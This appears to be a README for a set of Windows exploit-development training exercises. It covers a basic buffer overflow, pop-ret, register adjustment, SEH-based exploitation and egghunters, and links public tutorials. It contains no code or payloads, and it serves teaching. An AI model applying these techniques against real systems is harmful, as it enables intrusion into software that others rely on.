BADC0D3/ExploitDev_Wins_Exercise

Exploit Development Windows Exercise

Exercise 0 - Basic BO (Buffer Overflow)

The esp is right after eip.

Exercise 1 - pop + ret

It seems that there are 4 bytes of data infront of your shellcode. You need to pop that data and then call ESP.

Exercise 2 - add/sub [reg] + jmp

No register points directly to your shellcode, and ESP behind the shell by 100 bytes. You need to adjust the ESP register, so that it points to your shellcode and a way to jmp to ESP.

Exercise 3 - SEH (Structured Exception Handler)

How to user exception handler to exec your shellcode.

Exercise 4 - EggHunter

You have a very small buffer for your shellcode, now you need to use a egghunter to find your shell and exec it.

Resources:

• http://www.fuzzysecurity.com/tutorials/expDev/1.html
• http://www.securitysift.com/windows-exploit-development-part-1-basics/
• https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/